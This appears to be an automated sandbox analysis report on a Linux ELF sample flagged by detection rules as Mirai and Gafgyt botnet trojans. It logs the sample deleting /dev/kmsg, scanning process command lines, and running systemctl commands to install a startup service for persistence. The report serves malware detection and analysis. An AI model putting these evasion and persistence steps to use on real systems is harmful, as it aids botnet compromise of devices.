Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6576.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6578.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6498.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6528.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6546.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_5bf62ce4 reference_sample = 4c6aeaa6f6a0c40a3f4116a2e19e669188a8b1678a8930350889da1bab531c68, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 3ffc398303f7208e77c4fbdfb50ac896e531b7cee3be2fa820bc8d70cfb20af3, id = 5bf62ce4-619b-4d46-b221-c5bf552474bb, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_b14f4c5d os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = a70d052918dd2fbc66db241da6438015130f0fb6929229bfe573546fe98da817, id = b14f4c5d-054f-46e6-9fa8-3588f1ef68b7, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5f7b67b8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 6cb5fb0b7c132e9c11ac72da43278025b60810ea3733c9c6d6ca966163185940, id = 5f7b67b8-3d7b-48a4-8f03-b6f2c92be92e, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_88de437f reference_sample = 8dc745a6de6f319cd6021c3e147597315cc1be02099d78fc8aae94de0e1e4bc6, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = c19eb595c2b444a809bef8500c20342c9f46694d3018e268833f9b884133a1ea, id = 88de437f-9c98-4e1d-96c0-7b433c99886a, last_modified = 2021-09-16
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_389ee3e9 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 59f2359dc1f41d385d639d157b4cd9fc73d76d8abb7cc09d47632bb4c9a39e6e, id = 389ee3e9-70c1-4c93-a999-292cf6ff1652, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_cc93863b reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f3ecd30f0b511a8e92cfa642409d559e7612c3f57a1659ca46c77aca809a00ac, id = cc93863b-1050-40ba-9d02-5ec9ce6a3a28, last_modified = 2022-01-26
Source: 6489.1.0000000008048000.0000000008059000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_8aa7b5d3 reference_sample = 5217f2a46cb93946e04ab00e385ad0fe0a2844b6ea04ef75ee9187aac3f3d52f, os = linux, severity = x86, creation_date = 2022-01-05, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 02a2c18c362df4b1fceb33f3b605586514ba9a00c7afedf71c04fa54d8146444, id = 8aa7b5d3-e1eb-4b55-b36a-0d3a242c06e9, last_modified = 2022-01-26
Source: classification engineClassification label: mal76.spre.evad.linELF@0/3@54/0

Data Obfuscation

barindex
Source: /tmp/i586.elf (PID: 6269)Deleted: /dev/kmsgJump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6305)Directory: <invalid fd (9)>/..Jump to behavior
Source: /usr/libexec/gsd-rfkill (PID: 6305)Directory: <invalid fd (8)>/..Jump to behavior
Source: /lib/systemd/systemd-hostnamed (PID: 6312)Directory: <invalid fd (10)>/..Jump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1582/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/3088/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/230/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/110/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/231/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/111/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/232/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1579/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/112/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/233/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1699/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/113/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/234/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1335/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1698/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/114/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/235/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1334/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1576/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/2302/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/115/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/236/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/116/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/237/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/117/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/118/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/910/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/119/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/912/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/10/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/2307/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/11/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/918/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/12/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/13/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/14/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/15/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/16/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/17/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/18/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1594/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/120/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/121/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1349/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/122/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/243/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/123/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/2/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/124/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/3/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/4/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/125/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/126/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1344/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1465/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1586/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/127/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/6/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/248/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/128/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/249/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1463/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/800/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/9/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/801/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/4734/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/20/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/21/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1900/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/22/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/23/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/6251/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/24/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/25/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/26/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/27/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/28/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/29/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/491/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/250/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/130/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/251/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/6250/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/252/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/132/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/253/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/254/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/255/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/256/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1599/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/257/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1477/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/379/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/258/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1476/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/259/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1475/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/936/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/30/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/2208/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/35/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/6267/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1809/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6267)File opened: /proc/1494/cmdlineJump to behavior
Source: /tmp/i586.elf (PID: 6271)Shell command executed: sh -c "systemctl daemon-reload"Jump to behavior
Source: /tmp/i586.elf (PID: 6288)Shell command executed: sh -c "systemctl enable startup_command.service"Jump to behavior
Source: /usr/bin/dash (PID: 6310)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.n7e6qDIlaD /tmp/tmp.jHVnaNFY0j /tmp/tmp.dhaROQ2zZBJump to behavior
